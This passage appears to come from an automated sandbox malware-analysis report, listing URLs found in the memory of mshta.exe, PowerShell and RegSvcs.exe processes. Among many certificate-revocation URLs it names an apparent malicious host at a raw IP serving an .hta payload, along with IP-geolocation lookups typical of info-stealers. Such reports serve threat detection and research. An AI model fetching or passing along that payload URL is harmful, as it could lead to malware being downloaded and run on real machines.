Source: mshta.exe, 0000000C.00000003.468426129.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.000000000375C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaet
Source: mshta.exe, 00000004.00000003.417386530.00000000027A5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467894962.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470616202.0000000002B45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbo
Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htas
Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000025FA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000023F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.632431722.00000000053CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.000000000071B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000787000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449516187.000000001A62F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000787000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000007.00000002.441192247.000000000386C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.000000000261F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.000000000241E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.orgPLZ
Source: powershell.exe, 00000007.00000002.441192247.0000000002361000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 